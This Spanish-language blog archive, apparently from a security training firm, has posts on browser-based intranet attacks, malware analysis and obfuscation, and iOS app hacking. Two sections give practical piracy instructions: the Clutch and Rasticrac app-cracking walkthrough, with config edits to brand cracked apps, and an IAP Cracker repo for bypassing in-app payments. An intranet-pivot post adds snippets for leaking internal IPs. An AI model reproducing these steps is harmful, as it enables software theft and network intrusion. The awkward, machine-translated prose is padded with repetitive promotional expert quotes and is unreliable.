Tuesday, 29 September 2015
¿CÓMO HACKEAR Y EXPLOTAR LA RED INTERNA Y IPS PRIVADAS?
01:36
No comments
Según una encuesta por empresa de seguridad informática, la
mayoría de las personas creen que mientras se navegan por la Web que están
protegidas por firewalls y redes aisladas a través de direcciones privadas del
IP NAT. Con este entendimiento, asumimos la seguridad de los sitios web de
intranet y las interfaces basadas en routers, cortafuegos, impresoras,
teléfonos IP, sistemas de nómina, etc., aunque dejamos sin parchear. Pensamos
que permanecen seguro dentro de la zona protegida y nada es capaz de conectar
directamente desde el mundo exterior, ¿no?
Bueno, no del todo. Navegadores web pueden ser completamente
controlados por cualquier página web, lo que les permite atacar los recursos de
la red interna acuerdo con profesores de formación de hacking ético. La
navegador web de cada usuario en una red empresarial se puede cambiar en un
trampolín para los intrusos sin soluciones de seguridad perimetral avanzados.
Cómo alguien puede explotar la
red interna
Un experto de empresa de seguridad informática explica
los procedimientos para explotar la red interna:
§ Una víctima visita una página
web maliciosa, que asume el control de su navegador Web. La página web
maliciosa podría ser cualquiera página web, atada con un ataque XSS permanente
que hackers están siendo aprovechado para la entrega de malware masivo.
§ Cuando se ejecuta el malware, lo
hace desde la perspectiva de la intranet de la víctima, donde nadie puede
acceder directamente. Esto quiere decir que el navegador web de la víctima
puede ser instruido para entregar su dirección de NAT IP y hacer conexiones en
la red interna en nombre del atacante o víctima.
§ El malware utiliza navegador web
de la víctima como una plataforma de lanzamiento, donde el malware hace los
análisis de puertos, fingerprinting de los servidores web en la red interna y
revisa las soluciones de seguridad perimetral implementadas.
§ El malware se inicia los ataques
contra los objetivos internos y la información comprometida se envía fuera de
la red para la colección.
Es fácil a obtener la dirección
IP pública de un navegador web desde el servidor web, pero la dirección IP
interna es poco difícil menciona profesores de formación de
hacking ético. Esta es la pieza de información que necesitamos
para comenzar a explorar y explotar intranet. Para obtener IP interna, tenemos
que invocar Java en un navegador y un applet. Eso es una forma sencilla de hacerlo.
El siguiente código carga el MyAddress.class y luego abre la URL de
http://webserver/dirección_ip.html?nat
= XXXX
<APPLET
CODE=”MyAddress.class”>
<PARAM NAME=”URL”
VALUE=”http://webserver/ip_address.html?nat=”>
</APPLET>
Si el navegador web de la víctima es una Mozilla / Firefox, es
posible omitir el requisito subprograma e invocar una socket de Java
directamente desde el JavaScript.
function natIP() {
var w = window.location;
var host = w.host;
var port = w.port || 80;
var Socket = (new
java.net.Socket(host,port)).getLocalAddress().getHostAddress();
return Socket;
}
Framework para explotar la red
interna
Sonar
Sonar.js es un marco que utiliza JavaScript, WebRTC, y algunas
funciones onload para detectar dispositivos internos en una red. sonar.js
funciona mediante la utilización WebRTC para enumerar hosts en vivo en la red
interna. Mike Stevans profesor de formación de hacking ético explica que tras
enumerar las direcciones internas sonar.js intenta vincular a los recursos estáticos
como CSS, imágenes y JavaScript, mientras que conecta el controlador de eventos
onload. Si carga los recursos con éxito e inicia el evento onload entonces
sabemos que el anfitrión tiene este recurso.
¿Por qué es útil saber? Al obtener una lista de los recursos
alojados en un dispositivo, podemos intentar hacer fingerprinting de los
dispositivos y soluciones de seguridad perimetral.
¿Cómo funciona Sonar?
Al cargar payload de sonar.js en un navegador web moderno
sucederá lo siguiente:
§ sonar.js utilizará WebRTC para
enumerar lo IPs internas que tiene el usuario
§ sonar.js luego intenta encontrar
otros hosts en vivo de la red interna a través de webSockets.
§ Si no se encuentra una gran
cantidad en vivo, sonar.js comienza a intentar hacer fingerprinting mediante la
vinculación a ella a través de
<img src=”x”> and <link
rel=”stylesheet” type=”text/css” href=”x”>
y enganchar el proceso de onload. Si el recurso carga con éxito
se activará un evento para lanzar el exploit acuerdo con resultados de
fingerprinting.
Sonar.js trabaja sobre una base de datos de fingerprints.
Fingerprint es simplemente una lista de los recursos conocidos en una red que
se pueden vincular a y detectados a través onload. Ejemplos de esto incluyen
imágenes, hojas de CSS style, e incluso JavaScript externo.
Acuerdo con expertos
de empresa de seguridad informática, mediante
la creación de sus propias fingerprints se puede construir exploits
personalizados que serán lanzadas contra los dispositivos internos una vez que
son detectados por sonar.js. Exploits comunes incluyen cosas como la Cross-site
Request Forgery (CSRF), Cross-site Scripting (XSS), etc. La idea es que usted
puede utilizar estas vulnerabilidades para hacer cosas tales como modificar
configuraciones DNS del router, el sacar archivos desde un servidor de archivos
interno, y más.
Mediante el uso de sonar.js pentesting puede construir exploits
contra los servidores internos de registro, routers, impresoras, teléfonos
VOIP, y más menciona expertos de soluciones de
seguridad perimetral .
Debido a las redes internas a menudo están menos vigiladas, ataques como CSRF y
XSS pueden ser de gran alcance para hacerse cargo de las configuraciones de los
dispositivos internos de una red.
Monday, 21 September 2015
¿Cómo hacer ingeniería inversa de malware?
00:09
No comments
Software malicioso
puede ser virus, gusano, Troyano, Rootkit, Bot, herramienta de DoS, Exploit
Kit, spyware. El objetivo del análisis de malware es tener una comprensión de
la forma de trabajo de piezas específicas de malware. Hay preguntas importantes
que deben ser contestadas. Al igual que, ¿cómo se infecta máquina y qué hace
exactamente malware? En este artículo vamos a tratar de entender con la ayuda
de Bill Smith, experto de soluciones de
seguridad informática, los conceptos básicos de análisis de malware y
cómo se puede empezar a hacer análisis de malware.
¿Quién analiza el malware?
Hay diferentes tipos de personas y organizaciones
que hacen análisis de malware. Todos ellos caen bajo de estas categorías:
• CSIRT
• Desarrolladores de productos de seguridad
• Los proveedores de servicios de seguridad
• Investigadores de Anti-virus
• Los desarrolladores de software
• Agencias de seguridad del gobierno
¿Por qué hay una necesidad de analizar el
malware?
Las siguientes son las razones detrás de análisis
de malware.
• Disponer un procedimiento de respuesta a
incidentes de hacking.
• Para hacer el desarrollo de productos y la
mejora de productos como anti-virus.
• Para la creación de firmas para la protección
contra el malware.
• Para crear soluciones de contramedidas.
• Para hacer el análisis y resolución de
vulnerabilidad.
• Para rastrear y capturar a los delincuentes que
crean el malware.
Métodos de análisis de malware
De acuerdo con expertos de formación de seguridad
informática, para hacer análisis de malware tiene que seguir estos pasos:
1. Configuración del entorno
Configurar una máquina controlada que no está
conectada a la red, también debe ser capaz de restaurar esta máquina en
cualquier momento.
2. Colección del Malware
Para configurar el entorno es necesario descargar
el archivo de malware primero, y entonces usted necesita cambiar extensión de
archivo. De acuerdo con las sugerencias de expertos en curso de hacking ético,
después de bajar el archivo se puede copiar el archivo en un disco protegido ya
que esto puede ayudar a aislar el malware en algunos casos.
3. Análisis de superficie
Recuperar información de superficie de maquina con
malware sin ejecución. Motivo de análisis de superficie es conseguir:
• Valor Hash
• Tipo de archivo
• Strings
• Los resultados de programas antivirus
4. Análisis en tiempo de ejecución
En este paso se puede ejecutar malware y observar
su comportamiento. Puede utilizar varios métodos de análisis automatizados o
manuales. Puede utilizar las herramientas de observación en el sistema de
sandbox para su análisis. Todo el ambiente se puede ser dedicado o aislado OS
nativo o sistema virtual explica Mike Stevens, especialista del Mike Stevens,
experto de formación de seguridad informática.
5. Análisis estático
En el análisis estático debe leer el código en el
archivo binario y entender su funcionamiento. Usted necesitará el conocimiento
del sistema operativo, básico de lenguaje ensamblador, técnicas de lectura
eficientes y técnicas anti-análisis. Si está packed el código binario tendrá
que hacer unpacking. Además para entender el binario, usted tendrá que
descompilar o hacer disassemble/debug del binario.
Puede utilizar siguientes herramientas para el
análisis estático:
Disassembler
IDA Interactive DisAssemble: Se desensamblar más
de 50 arquitecturas
Decompiler
Hex-rays Decompiler: x86/ARM binario a codigo de C.
VB Decompiler: Binario de Visual Basic a código
fuente de Visual Basic.
.NET Reflector: .NET binario a código fuente de
.NET.
Debugger
OllyDbg: Muy famoso x86 debugger
Immunity Debugger: x86 debugger de Python
Para entender el código, puede comenzar con las
API de Windows de MSDN Library y entender lo que hace el API. También puede
comprobar que hacen argumentos y condiciones. Mientras se utiliza un
Disassembler, se puede leer, cambiar el nombre y comentar instrucciones para
entender el código. Usted puede aprender más sobre Disassembler en curso de formación de hacking
ético.
6. Codificación (ofuscación) en Malware
A veces el programador de malware hace ofuscación del
código para hacer que sea difícil para que usted pueda hacer el análisis del
código.
Nombre de archivo, nombre de la entrada del
registro, dirección del servidor almacenada en el binario se codifican como
strings. Además paquetes de datos de HTTP pueden ser codificados utilizando
diferentes métodos. Algunos de los métodos de codificación son
• xor (exclusive or)
• ror/rol (rotate right/left)
• base64
• RC4
• AES
También todo los malwares estos días usan C&C
servidor (servidor de comando y control) para obtener los comando, devolver los
resultados y datos. Los hackers pueden crear servidores C&C utilizando
servidores hackeados, sitios web o cuentas de correo electrónico. También se
pueden utilizar Twitter y Facebook cuentas como servidor C&C, de manera que
no podemos rastrearlos. Pueden aprender cómo crear servidor C&C utilizando
cuentas de redes sociales durante la capacitación de la seguridad informática
de iicybersecurity.
7. Prevenir análisis de Malware en tiempo de
ejecución
Algunos tipos de malware son lo suficientemente
inteligente como para detectar la actividad de análisis por lo tanto tienen una
lógica para evitar el análisis por los analistas de malware explica experto
soluciones de seguridad informática. Algunas de las técnicas utilizadas para
detectar análisis de malware son:
Debugger: Para comprobar si hay debuggers, el
malware revisa por puntos de interrupción, manejo de excepciones.
Máquina virtual: Para comprobar si hay máquina
virtual, el malware revisa por la interfaz, el comportamiento de la CPU,
Herramientas de soporte (como el Virtual box).
Herramientas de análisis: Para comprobar si hay
herramienta de análisis de malware como IDA Pro, el malware revisa por el
nombre de la ventana, el nombre del módulo.
El malware veces también puede comprobar el nombre
del ordenador, el tamaño del disco, la posición del cursor para evitar el
análisis de malware. Después de detectar que se realiza el análisis de malware,
lo hace algo diferente o no hace nada.
Vamos a cubrir más detalles en profundidad sobre
análisis de malware en el próximo artículo con la ayuda de Mike Stevens,
profesor de formación hacking ético.
Friday, 11 September 2015
Metodologías de ofuscación de código de malware para evasión de antivirus
00:11
No comments
Acuerdo con profesionales de seguridad informática, las dos razones principales de la utilización de la ofuscación del
código en malware son:
1. Para disuadir la ingeniería
inversa estática de malware. Se hace más difícil a enfocar las secciones de
código más importante.
2. Para que las firmas
estáticas utilizadas por los vendedores de AV no puedan detectar malware, ya que
las firmas se basan en secuencias de bytes específicas en el binario.
Vamos a entender con ayuda de
expertos de formación y servicios de hacking ético de IICS las
metodologías que usan programadores de malware. Abajo hay diferente
metodologías usadas por los programadores de malware para hacer ofuscación de
control de flujo en malware.
Ofuscación por funciones de
callback definida por la aplicación
Hay ciertas APIs proporcionadas
por Microsoft, lo que nos permite registrar una función de callback. Estos
pueden ser utilizados por malware para ocultar la lógica principal de su
código. Pueden pasar un puntero a la subrutina malicioso como el parámetro de
callback para la API. Cuando se crea window usando CreateWindowA (), el
procedimiento de window se invoca con ciertos mensajes por defecto como
WM_CREATE, WM_NCCREATE y así sucesivamente. Sin embargo, se ejecutará el código
del virus principal solamente cuando se recibe un mensaje de window en
particular explico Bill Smith experto de seguridad en la nube que maneja equipo
de análisis de malware de la nube.
Ejecución a través de manejo
de excepciones
Malware también podría
redirigir la ejecución de la subrutina malicioso mediante la activación de una
excepción. Para ello, primero se registran un manejador de excepciones
utilizando RtlAddVectoredExceptionHandler () o mediante el registro de un nuevo
manejador de excepciones estructurado.
Expertos de empresa de seguridad informática explican
que la excepción se puede invocar utilizando cualquiera de los siguientes:
1. Activación de una violación
de acceso a memoria, tratando de escribir en una dirección de memoria a la que no
hay acceso de escritura o intentando llamar a una dirección de memoria no
válida.
2.
Ejecución de una instrucción privilegiada como STI o CLI, que daría lugar a una
excepción privilegiada en modo protegido.
3. Realización de una división
por cero para activar la excepción.
Controlar debugger
Según expertos de hacking
ético, hay ciertas instrucciones especiales o secuencia de instrucciones que
cuando se ejecuta en el debugger cambian el comportamiento predeterminado del
debugger. Eso ayuda en ofuscación de control de flujo del código en debugger y
hace más difícil entender el código.
NT 2D tiene un comportamiento
especial en Olly debugger. Olly se saltará el siguiente byte en la ejecución
como resultado de los cuales se ofusca el flujo de control. Esta técnica se
refiere a menudo como byte scission. También tiene un comportamiento dinámico
en diferentes entornos.
Overwrite RETN: Este es un
comportamiento especial observado en Olly debugger. Si sobre escribimos la
instrucción RETN con el código de operación, 0xC3 (que es el código de
operación de RETN) justo antes de ejecutar RETN, debugger no se detiene en la
dirección RETN sino que se ejecuta el código dentro del debugger.
Instrucciones chatarras
Hay varios motores polimórficos
que son utilizados por los autores de malware para generar versiones
modificadas de su binario que realizan las mismas actividades en la máquina,
sin embargo se modifica su código explica Bill Smith experto de servicios de seguridad en la nube. Esto se utiliza a menudo para evitar firmas
estáticas escritas por detectar malware por proveedores de seguridad. Una de
las características importantes de un motor polimórfico es el generador de
instrucciones chatarras. Instrucciones chatarras son secuencia de instrucciones
que no afectan a la lógica general del código de ninguna manera, pero se
colocan para disuadir la ingeniería inversa. Entre cada instrucción útil, se
colocan varios bytes chatarras. Las principales razones para la inyección de
instrucciones chatarras en la sección de código son:
1. Estos bytes chatarras
podrían corresponder las instrucciones que no alteran la lógica general del
código. Aumentan el tamaño de la sección de código y disuadir la ingeniería
inversa, ya pesar de que estas instrucciones parecen ser legítimas y no tienen
ningún impacto en el comportamiento principal del virus.
2.
Instrucciones chatarras inyectados en el área de instrucciones corresponden a
las instrucciones parciales. Esto se hace para confundir a los desensambladores
que se basan en algoritmos como Linear Sweep y Recursive Traversals.
3. El código puede ser ofuscado
aún más mediante el uso de predicados opacos que se pueden combinar con las API
de Windows que siempre va a devolver un valor fijo.
Hay algunas
tecinas más de ofuscación de código usado por los hackers menciona Bill Smith y
alguien con experiencia en seguridad informática o seguridad en la nube puede
entender fácilmente y vamos a cubrir eso en próximo artículo.
Wednesday, 2 September 2015
¿Cómo usar Cycript para romper apps de iOS?
00:33
No comments
Acuerdo con los profesionales de empresa de seguridad
informática, Cycript permite a los desarrolladores para explorar y modificar aplicaciones
que se ejecutan en iOS o Mac OS X utilizando un híbrido de Objective-C ++ y la
sintaxis de JavaScript a través de una consola interactiva que cuenta con
resaltado de sintaxis. Escrito por Jay Freeman (Saurik) de Cydia, lo que hace
es darnos una manera interactiva e inmediata para modificar los procesos que se
ejecutan en iOS índico experto de seguridad en la nube.
Si hacemos SSH en un dispositivo iOS con cycript
instalado, podemos ejecutarlo directamente desde el dispositivo. Esto
inmediatamente nos da acceso a un entorno REPL configurado y estamos listos
para jugar señaló Mike Stevens maestro de formación de hacking ético de la
organización International Institute of Cyber Security. Es en este punto
también podemos decidir cuál es el proceso para inyectar nuestras
modificaciones en.
Usted puede inyectar en el proceso de Springboard. El
Springboard ayuda a controlar todo, desde la pantalla de bloqueo para la
aplicación de conmutación. Antes de usar Cycript y cambiar algo, tenemos que
saber lo que queremos cambiar, su nombre y dónde se encuentra menciono experto
de sistemas de seguridad en la nube icloud.
Hay varias maneras de encontrar algo que queremos
cambiar usando cycript. Una forma es utilizar los header dumps que he
mencionado antes de interactuar con las clases, métodos y variables
directamente escribiendo sus nombres menciono el experto de empresa de seguridad informática . Otro
método - útil si se está modificando una aplicación en lugar de Springboard -
es llamar UIApp.keyWindow.recursiveDescription que imprimirá una descripción
jerárquica de la configuración de la pantalla en este momento. Usted puede
trabajar hacia atrás desde la parte inferior de esta descripción para encontrar
finalmente la clase que usted desea cambiar.
El método que utilizaremos es función integrada en
cycript llamada choose. La función de choose busca en la memoria de proceso
inyectado para cualquier clase que busca, y agarra todo como una matriz. Por
ejemplo podemos pedir todas las instancias de la clase UILabel, suponiendo que
nuestro mensaje No hay Notificaciones será un UILabel. Según Jim Taylor experto
de seguridad en la nube que debido
a la gran cantidad de UILabel en la memoria, puede fácilmente instalarlo de
modo que cycript muestra sólo el texto de las etiquetas. Afortunadamente,
debido a la naturaleza de la escritura y de cycript, podemos hacer esto en una
sola línea.
[choose(UILabel)[i].text for(i in choose(UILabel))]
for(i in
choose(UILabel)) if (choose(UILabel)[i].text == "No Notifications")
nnLabel = choose(UILabel)[i];
En el fragmento anterior, hemos guardado el UILabel
que es texto coincidente " No Notifications " como nnLabel. Ahora
podemos interactuar con la etiqueta tanto como nosotros queremos, e incluso
llamar a todos los métodos habituales se pueden usar en un UILabel.
Por desgracia, este pequeño cambio de
piratería de memoria no es permanente, cerrar y volver a abrir el centro de
notificación provocará código original de Apple para volver a ejecutar y
arruinar todo nuestro duro trabajo. Hacer lo permanente el trabajo será el tema
que pueden aprender durante de formación de hacking ético, que describe cómo se puede
enganchar en el código de Apple mediante programación para cambiar lo que
realmente se ejecute, en lugar de cambios temporales.
Thursday, 20 August 2015
Como crack aplicación de iOS App store
00:08
No comments
Podemos crack cualquier aplicación en nuestro
dispositivo iOS con la ayuda de este software. Todas las aplicaciones
descargadas de la App Store se guardan en /var/mobile/Applications/ y se
almacenan en forma encriptado acuerdo con los profesionales de empresa de
seguridad informática en México. Tendremos que descifrar estas aplicaciones
para hacer el análisis de ellas. Podemos descifrar las aplicaciones con la
ayuda de Clutch o Rasticrac.
Clutch funciona con la mayoría de las aplicaciones y
el bueno de clutch es que podemos configurar los valores de configuración de
acceso a través de la MobileTerminal. Cluch puede hacer crack de la mayoría de
todas las aplicaciones ARMv7 con facilidad explica maestro de curso de hacking
ético. En terminal escriba el siguiente comando
Clutch Esto
ahora enumerar todas las aplicaciones cifradas que están instaladas en su
dispositivo, seleccione la aplicación que desea a crack y escribe el siguiente
comando Clutch "Nombre de aplicación" Clutch ahora comenzará a
hacer cracking de la aplicación elegida / s, y una vez hecho, le dirá y volver
a la línea de comandos. La aplicación agrietada se colocan en
/var/root/Documents/Cracked o /User/Documents/Cracked
Pueden entender con más detalle en el entretenimiento de hacking ético de qué hacer con la aplicación agrietada y cómo mudar
la aplicación en AppAddict. Si usted va a hacer cracking de muchas
aplicaciones, sería una buena idea para personalizar sus herramientas de
cracking ligeramente y haga que su nombre añade al nombre del archivo según
consejos de expertos de seguridad de la nube en México. También podemos hacer
que lo que un expediente de crédito secreta se coloca dentro de la aplicación
con su nombre, esto es lo que las personas no pueden robar su trabajo. Vaya a
la siguiente carpeta de su dispositivo
/etc Allí podrá ver un archivo llamado
"clutch.conf" abre este archivo con su editor y modifica los
siguientes dependiendo de lo que quieras.
CreditFile no (Cambio
en Yes para crear archivos de crédito dentro de la aplicación) FilenameCredit
no (Cambio en YES para agregar el nombre de Cracker a nombre del archivo)
CrackerName (Ingrese su nombre Cracker entre medio) ListWithDisplayName Sí
(Cambiar al directorio a la lista de aplicaciones en forma completa dentro del
menú de Cracker) MetadataEmail (Puede cambiar cualquier dirección de correo
electrónico)
Rasticrac
Rasticrac es uno de los más poderosos utilidad de
cracking y su fácil de usar y funcionalidades es mejor que el Clutch según
recomendación de curso de hacking ético y seguridad informática en México.
Rasticrac es una versión actualizada de la herramienta PCM Cracking
(PoedCrackMod). Rastcrac se ejecuta en todos los dispositivos iOS.
En su terminal escriba el siguiente comando
rasticrac -m Esto
ahora mostrará una lista de todas las aplicaciones cifradas que están
instalados en el dispositivo, aparecerá una lista de la aplicación con un
número, letra o combinación de ambos en el lado dependiendo del número de
aplicaciones que ha instalado. Escribe App /s junto con que el número o símbolo
de la aplicación que desea crack menciono el experto de empresa
de seguridad informática. Rasticrac
ahora comenzará a trabajar en crack la app / s que ha elegido. La aplicación
agrietada se colocan en
/var/root/Documents/Cracked
Vaya a la siguiente ubicación de su dispositivo
/usr/bin Allí podrá ver un archivo llamado "rasticrac" abrir este
archivo con el editor de texto y modifique los siguientes dependiendo de lo que
quieras
# - CrackerName defecto (o
"Anónimo"). RCcracker = "Anónimo" (Cambiar a su nombre de
Cracker) # - En caso de "detalles extra" aparecerá en el nombre Ipa
(es decir: "iPad / 3GS / etc) RCextras = "YES" (Cambiar a NO si
no desea información adicional se suma a los nombres de los archivos de las
aplicaciones Según Jim Taylor experto de servicios de seguridad en la nube) # - Si la escritura hablar con usted? (que sólo
habla Inglés, sólo que con iOS4 +, solamente con "hablar" herramienta
desde Cydia) RCspeak = "YES" (Cambiar a NO para apagar la voz) # - Si
el nombre del artista puede utilizar en el nombre de archivo? RCartistfrommeta
= "YES" (Cambiar a NO si no desea que el nombre desarrolladores en
sus aplicaciones agrega el nombre de archivo)
Monday, 17 August 2015
Pruebas de Penetración - Cracking - Análisis de iOS Apps
23:40
No comments
Para pruebas de
penetración y cracking de las aplicaciones de dispositivos iOS tendremos que
configurar un entorno. Con el uso de este entorno podemos jugar con nuestras
aplicaciones o aplicaciones disponibles en el App Store. En realidad, no
importa qué dispositivo iOS que usted elija. Un iPad es probablemente el
dispositivo más adecuado ya que puede ejecutaraplicaciones de iPhone e iPad.
Para hacer pruebas de penetración en detalle de las aplicaciones vamos a
necesitar un dispositivo móvil con jailbreak iOS ya que con jailbreak podemos
tener acceso de root en el dispositivo y probar los procesos relacionados también.
Jailbreaking el dispositivo e instalar Cydia no es tan difícil y usted puede
encontrar fácilmente en Internetcómo hacer jailbreak a su dispositivo,
dependiendo del modelo y la versión de firmware explica Mike Stevens, experto
de formación en seguridad informática.
Para pruebas de penetración o hacer un crack de
una aplicación, no es necesario tener un Mac como podemos utilizar la máquina
Linux o máquina virtual de OS X. También podemos utilizar un dispositivo Mac;
sin embargo, es más fácil de revisar el código en el dispositivo Mac. Para
conectar su computadora a su ipad necesitaremos SSH en nuestro ipad con
jailbreak iOS.
OpenSSH
Necesitamos instalar OpenSSH de Cydia en nuestro
dispositivo. Esto nos permitirá iniciar sesión en el dispositivo jailbreak como
root. Con la dirección IP del ipad vamos a ser capaces de hacerun SSH a nuestro
ipad. La contraseña predeterminada para la cuenta root en iOS es alpine, pero
vamos a cambiarla, así como la contraseña para el usuario móvil, a otra
contraseña para protegerla de los ataques de malware.
Instalar herramientas Xcode y Command Line
Xcode incluye todo lo que necesitamos para crear
aplicaciones para el iPhone, iPad, Mac yApple Watch. El lenguaje de
programación Swift tiene grandes características que hacen que su código sea
aún más fácil de leer y escribir. Expertos en
soluciones y servicios de seguridad informática dicen que Xcode es IDE
de Apple e incluye el último SDK iOS y simulador de iOS. Está disponible de
forma gratuita en la Mac App Store. Una vez que está instalado Xcode asegúrese
de instalar las herramientas de línea de comandos.
class-dump-z
Class-dump-z se utiliza para sacar la información
de clase desde una aplicación iOS. Para descargar e instalar class-dump-z entra
a su página oficial y siga las instrucciones. Ir dentro de la iphone_armv6
carpeta y copiar el ejecutable class-dump-z en / usr / bin. Esto se asegurará
de que pueda ejecutar la class-dump-z del dispositivo. Con class-dump-z podemos
analizarinformación de clase de las aplicaciones. Por ejemplo, podemos sacar la
información de clase de la aplicación de Apple Messenger mencionó profesor de
formación de hacking
ético.
Clutch y Rasticrac
Podemos romper cualquier aplicación en nuestro
dispositivo iOS con la ayuda de este software.Todas las aplicaciones
descargadas de la App Store se guardan en /var/mobile/Applications/ y se
almacenan en forma encriptada. Tendremos que descifrar estas aplicaciones para
hacer el análisis de ellas. Podemos descifrar las aplicaciones con la ayuda de
Clutch o Rasticrac según expertos en soluciones de seguridad informática.
IAP Cracker
IAP Cracker, es una herramienta para los
dispositivos iOS con iOS 8.0 / 8.1 y también tenemos IAP cracker para iOS 7.1.2
/ 7.1.1 / 6.0. IAP cracker permite tener aplicaciones gratis ya que no pasa por
la página de pago, permitiendo a los usuarios para obtener funcionalidad de la
aplicación o uso de la aplicación. IAP cracker permite a conseguir todas las
compras de forma gratuita pagados in-app. Así IAP cracker nos permite utilizar
todas las compras in-app y obtenermonedas gratis para todos los juegos que se
hemos jugado en dispositivo iOS. Repo de IAP cracker es
http://system.in-appstore.com/repo/ y se puede instalar la tienda de
aplicaciones local en su dispositivo.
Análisis con GDB
Casi todas las aplicaciones nativas de iOS están
escritas en Objective-C. Es un lenguaje orientado tiempo de ejecución, lo que
significa que siempre que sea posible, se aplaza decisiones de tiempo de
compilación y enlace para el momento en que realmente se está ejecutando el
código de la aplicación. Con GNU debugging (GDB) podemos enganchar en unproceso
que se ejecuta y ejecutar nuestro código o modificar una aplicación. Mientras
se ejecuta GDB tenemos que asegurarnos de que el proceso está en marcha. Y
utilizando el identificador de proceso podemos controlar el flujo y el gancho
en el código de la aplicación dice profesor de formación de hacking ético.
Cycript
Cycript nos permite hacer Swizzling. Cycript
permite a los desarrolladores para explorar y modificar aplicaciones que se
ejecutan en ambos iOS o Mac OS X utilizando un híbrido de Objective-C ++ y la
sintaxis JavaScript a través de una consola interactiva. También se
puedeconectar a un proceso en ejecución y nos ayudan a modificar muchas de las cosas
en la aplicación en tiempo de ejecución. Si SSH en un dispositivo iOS con
cycript instalado, podemosejecutarlo directamente desde el dispositivo. Esto
inmediatamente nos da acceso a un entorno REPL configurado y estamos listos
para jugar. Es en este punto también podemos decidir cuál es el proceso para
inyectar nuestras modificaciones en. En lo que se refiere a aplicación de iOS,
nos permite gancho en un proceso que se ejecuta y podemos jugar con las
clases,controladores, liberarías, variables, métodos.
Snoop-it
Snoop-it una herramienta para ayudar a las
evaluaciones de análisis dinámico y de seguridad de la caja negra de
aplicaciones móviles mediante la adaptación de aplicaciones existentes con
capacidades de debugging y rastreo en tiempo de ejecución. Snoop-it permite
manipulaciones sobre la marcha de aplicaciones iOS arbitrarias con una interfaz
de usuario fácil de usar gráfica.Pasar por las restricciones del lado del
cliente o desbloquear características adicionales y contenido premium de las aplicaciones
es muy fácil con snoop-it explica Mike Stevens, experto de formación de
seguridad informática.
Saturday, 1 August 2015
Tipos de evidencias forenses en Mac OS X
01:18
No comments
Mac
OS X almacena evidencias forenses importantes dentro del sistema de archivos
según profesionales de seguridad informática en México. Estas evidencias se
almacenan utilizando diferentes tipos de formatos. Algunos de ellos son bien
conocidos tales como texto plano ASCII, archivos XML o bases de datos; mientras
que otros son estructuras binarias utilizadas sólo por Mac OS X.
Experto
de International Institute of Cyber Security que proporciona servicios de
forense digitales, hacking ético en México, seguridad en la nube en México
señaló Los archivos binarios tienen muy poca documentación necesaria para
comprender cómo la información se almacena. Por esta razón, se requiere una
ingeniería reversa para entender cómo se guarda esta información.
El
primero y fácil método para comprender los archivos de formato es leer el
contenido del archivo con un editor hexadecimal que puede representar la
información como una representación en valores hexadecimales, valores binarios
o caracteres ASCII.
Algunos
archivos binarios tienen cabecera y registros, mientras que otros no tienen
cabecera indico experto de seguridad en la nube en México. La identificación si
el binario tiene cabecera es cuando la cabecera termina y cuando los registros
comienzan. Debe realizarse eso para identificar qué parte del archivo
corresponde la cabecera y que parte los registros. Los investigadores de seguridad
informática de dicen que proceso de análisis que debe hacerse para
tratar de reconocer la información teniendo en cuenta las cadenas ASCII y el
valor entero de la combinación hexadecimal entre: nibble, byte, 2 bytes, 4 bytes
y 8 bytes que se pueden guardar en Little Endian o Big Endian que puede
representar valores como la fecha y hora, longitud, UID, GID, PID, la dirección
IP, los valores de retorno, etc.
Apple
por lo general proporciona sus propias herramientas que pueden leer estas
evidencias. Por lo tanto, tener los resultados de estas herramientas y tener
los archivos binarios como fuentes, el investigador puede tratar de igualar los
valores para entender cómo funciona el proceso de almacenamiento indica
investigador de seguridad en la
nube. A continuación se presentan diferentes tipos de archivos de
evidencias:
•
Módulo básico de seguridad (BSM): archivos binarios que almacenan los registros
de auditoría del kernel. Cada archivo BSM tiene una o más registros. Cada registro
es un grupo de estructuras C llamada fichas donde cada una de estas fichas
guarda un tipo de información específica.
• ASL (Binary Apple System Log): es el servicio de
daemon log por defecto para Mac OS X llamada Apple System Log.
•
Keychain: archivos binarios de base de datos que contiene tablas para almacenar
diferentes tipos de registros. El archivo se utiliza para almacenar las
contraseñas y las certificaciones de las aplicaciones, recursos de Internet,
redes como wifi o bluetooth, y así sucesivamente.
•
Propio formato binario: algunas evidencias almacenan su información a través de
su propia estructura binaria de datos. Como ejemplo Java IDX y Cookies
binarios.
•
Plist: archivos utilizados por aplicaciones externas y Mac OS X. Se utiliza
para almacenar configuraciones de aplicación y del sistema. Puede almacenar en
dos formatos diferentes: XML y formato binario Plist llamada BPlist.
•
Texto plano: archivos que se requieren unas expresiones regulares para ser
analizados. Estos archivos representan datos de timestamp y de rendimiento.
•
XML: archivos con una estructura específica.
•
SQLite: pequeña base de datos que se utiliza porque es fácil a acceso y guardar
los datos sin necesitar un servidor de base de datos de pesada. Por lo general,
contiene
el
registro de las aplicaciones de usuario, tales como Skype, Chrome o Firefox y
algunos cachés de Mac OS X.
Estas evidencias se almacenan en el sistema de archivos de
Mac OS X usando uno de los tipos de archivo se ha explicado anteriormente con
ayuda de experto de hacking ético.